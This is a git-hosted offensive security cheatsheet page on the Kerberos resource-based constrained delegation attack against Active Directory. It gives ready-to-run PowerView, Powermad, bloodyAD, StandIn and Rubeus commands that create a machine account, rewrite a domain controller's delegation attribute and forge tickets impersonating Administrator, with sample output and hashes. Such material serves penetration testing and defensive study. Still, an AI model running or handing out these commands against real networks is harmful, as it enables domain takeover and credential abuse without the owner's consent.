daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

kerberos-delegation-rbcd.md (5701B)


      1 ---
      2 title: "Kerberos Delegation - Resource Based Constrained Delegation"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/kerberos-delegation-rbcd.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/kerberos-delegation-rbcd.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Kerberos Delegation - Resource Based Constrained Delegation
     12 
     13 Resource-based Constrained Delegation was introduced in Windows Server 2012.
     14 
     15 > The user sends a Service Ticket (ST) to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a ST for the user to Service B.  <https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html>
     16 
     17 1. Import **Powermad** and **Powerview**
     18 
     19     ```powershell
     20     PowerShell.exe -ExecutionPolicy Bypass
     21     Import-Module .\powermad.ps1
     22     Import-Module .\powerview.ps1
     23     ```
     24 
     25 2. Get user SID
     26 
     27     ```powershell
     28     $AttackerSID = Get-DomainUser SvcJoinComputerToDom -Properties objectsid | Select -Expand objectsid
     29     $ACE = Get-DomainObjectACL dc01-ww2.factory.lan | ?{$_.SecurityIdentifier -match $AttackerSID}
     30     $ACE
     31     ConvertFrom-SID $ACE.SecurityIdentifier
     32 
     33     # alternative (Windows/Linux)
     34     bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get writable --otype COMPUTER --detail | egrep -i 'distinguishedName|msds-allowedtoactonbehalfofotheridentity'
     35     ```
     36 
     37 3. Abuse **MachineAccountQuota** to create a computer account and set an SPN for it
     38 
     39     ```powershell
     40     New-MachineAccount -MachineAccount swktest -Password $(ConvertTo-SecureString 'Weakest123*' -AsPlainText -Force)
     41 
     42     # alternative (Windows/Linux)
     43     bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add computer swktest 'Weakest123*'
     44     ```
     45 
     46 4. Rewrite DC's **AllowedToActOnBehalfOfOtherIdentity** properties
     47 
     48     ```powershell
     49     $ComputerSid = Get-DomainComputer swktest -Properties objectsid | Select -Expand objectsid
     50     $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
     51     $SDBytes = New-Object byte[] ($SD.BinaryLength)
     52     $SD.GetBinaryForm($SDBytes, 0)
     53     Get-DomainComputer dc01-ww2.factory.lan | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
     54     $RawBytes = Get-DomainComputer dc01-ww2.factory.lan -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
     55     $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
     56     $Descriptor.DiscretionaryAcl
     57 
     58     # alternative (Windows/Linux)
     59     # use 'remove' instead of 'add' after exploit
     60     bloodyAD --host 10.1.0.4 -u user -p 'totoTOTOtoto1234*' -d crash.lab add rbcd 'dc01-ww2$' 'swktest$'
     61     ```
     62 
     63     ```ps1
     64     # alternative
     65     $SID_FROM_PREVIOUS_COMMAND = Get-DomainComputer MACHINE_ACCOUNT_NAME -Properties objectsid | Select -Expand objectsid
     66     $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$SID_FROM_PREVIOUS_COMMAND)"; $SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0); Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
     67 
     68     # alternative
     69     StandIn_Net35.exe --computer dc01 --sid SID_FROM_PREVIOUS_COMMAND
     70     ```
     71 
     72 5. Use Rubeus to get hash from password
     73 
     74     ```powershell
     75     Rubeus.exe hash /password:'Weakest123*' /user:swktest$  /domain:factory.lan
     76     [*] Input password             : Weakest123*
     77     [*] Input username             : swktest$
     78     [*] Input domain               : factory.lan
     79     [*] Salt                       : FACTORY.LANswktest
     80     [*]       rc4_hmac             : F8E064CA98539B735600714A1F1907DD
     81     [*]       aes128_cts_hmac_sha1 : D45DEADECB703CFE3774F2AA20DB9498
     82     [*]       aes256_cts_hmac_sha1 : 0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347
     83     [*]       des_cbc_md5          : BA297CFD07E62A5E
     84     ```
     85 
     86 6. Impersonate domain admin using our newly created machine account
     87 
     88     ```powershell
     89     .\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap
     90     .\Rubeus.exe s4u /user:swktest$ /aes256:0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap
     91 
     92     [*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan'
     93     [*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5)
     94     [*] Building S4U2proxy request for service: 'cifs/dc01-ww2.factory.lan'
     95     [*] Sending S4U2proxy request
     96     [+] S4U2proxy success!
     97     [*] base64(ticket.kirbi) for SPN 'cifs/dc01-ww2.factory.lan':
     98 
     99         doIGXDCCBligAwIBBaEDAgEWooIFXDCCBVhhggVUMIIFUKADAgEFoQ0bC0ZBQ1RPUlkuTEFOoicwJaAD
    100         AgECoR4wHBsEY2lmcxsUZGMwMS[...]PMIIFC6ADAgESoQMCAQOiggT9BIIE
    101         LmZhY3RvcnkubGFu
    102 
    103     [*] Action: Import Ticket
    104     [+] Ticket successfully imported!
    105     ```
    106 
    107 ## References
    108 
    109 * [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html)
    110 * [A Case Study in Wagging the Dog: Computer Takeover - Will Schroeder - Feb 28, 2019](https://posts.specterops.io/a-case-study-in-wagging-the-dog-computer-takeover-2bcb7f94c783)